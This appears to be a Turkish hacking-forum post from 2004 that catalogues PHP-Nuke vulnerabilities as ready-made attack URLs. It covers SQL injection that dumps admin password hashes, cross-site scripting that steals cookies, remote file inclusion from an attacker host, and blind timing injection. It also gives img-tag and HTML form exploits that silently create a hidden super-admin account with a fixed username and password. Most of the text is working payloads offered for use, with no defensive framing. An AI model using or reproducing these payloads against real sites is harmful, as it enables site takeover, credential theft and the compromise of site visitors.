açıklar güncelden
eskiye doğru sıralanmaktadır
11.06.2004
önizleme moduna saldırı
Kod: |
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00&score=9999
|
Kod: |
http://www.siteninadı.com/phpnuke yolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999
|
sistemden cookie çalma bu yolla admin gibi
login olabilirsiniz yada md5 hash ini crackliyebilirsiniz
Kod: |
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=a
|
bu kod çalışmazsa geri tuşuna basın bidaha
ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir
admin.php yoluna ulaşmak
Kod: |
http://www.siteninadı.com/phpnukeyoluadmin/case/case.adminfaq.php/admin.php?op=FaqCatGo
http://www.siteninadı.com/phpnukeyolu/admin/admin.php/index.php
http://www.siteninadı.com/phpnukeyolu/admin/modules/blocks.php/admin.php
|
bu tehlikeli açıklardan biridir phpnuke
portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya
yada kod bilgisayarınıza iner oto çalıştırılabilir
Kod: |
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=ftp://ftpadresiniz.com/dizin/
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=//saldırganın
ip si/bilgisayardaki klasörün adı/ |
cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs
Kod: |
http://wwwsiteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss
code here]&thold=0
http://www.siteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss
code here]
http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>
http://www.siteninadı.com/nukeyolu/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar
|
modules.php yardımıyla siteden bilgi çalma yönetim paneline login
vs.vs
Kod: |
http://www.siteninadı.com/nukeyolu/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radmins
uper=1/**/LIMIT/**/1/* |
cookie ayıklama kodundaki hatadan kaynaklanaan
sitede herhangi bir script çalıştırılması yada istenilen kişinin
cookie aracılıyla hash inin bulunması
Kod: |
http://siteninadı.com/nukeyolu/index.php?user=MTo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ%2bZm9vYmFy |
sql injection açığı
database modifiye edilmeye olanak verir admin eklenebilir ve önemli
bilgilere ulaşılabilir hash özel mesja yoluyla alınır
Kod: |
http://www.siteninadı.com/nukeyolu/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox
|
admin oluşturma
Kod: |
http://www.siteninadı.com/nukeyolu/admin.php?op=AddAuthor&add_aid=dropby23&add_name=God&add_pwd=12345&add_email=hah@mail.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
|
kullanıcı adı dropby23 şifre 12345 olur
image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img]
gibi
Kod: |
[img]http://www.example.com/admin.php?op=AddAuthor&add_aid=dropby23&add_name=God&add_pwd=12345&add_email=kala@hot.ee&add_radminsuper=1[/img]
|
kullanııc adı dropby23 şifre 12345 olur
img taglarla belirlenmiş kod admin tarafından okunduğunda god admin
olursunuz ve silinemezsiniz
search engine açığı md5 e ulaşmak
[code]http://www.siteninadı.com/nukeyolu/search?q=Maty+Scripts%27UNION
SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1)/*"
error.php açığı devamlı hata vermesini sağlar sitenin
[code]http://www.siteninadı.com/phpyolu/error.php?newlang=dropby23
[/code]
yukardaki kodla etkilenmiş siteyi aşağıdaki kodla bi index.hrm
hazırlayın ve sadece ona tıklamanız yeterli adminsiniz
[code]
<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>
<FORM action="http://www.sitebibadı.com/error.php" method="POST">
<input type="hidden" name="error" value="<img width='0' height='0'
border='0'
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=dropby23&add_name=God&add_pwd=12345&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">
</FORM>
hata sayfası olarak bu kodu hazırlayın inde.htm ve adminin görmesini
sağlayın ve adminsiniz
kullanıcı adı dropby23 şifre 12345
</center>
<br><br><br>
</BODY>
</HTML>
[/code]
|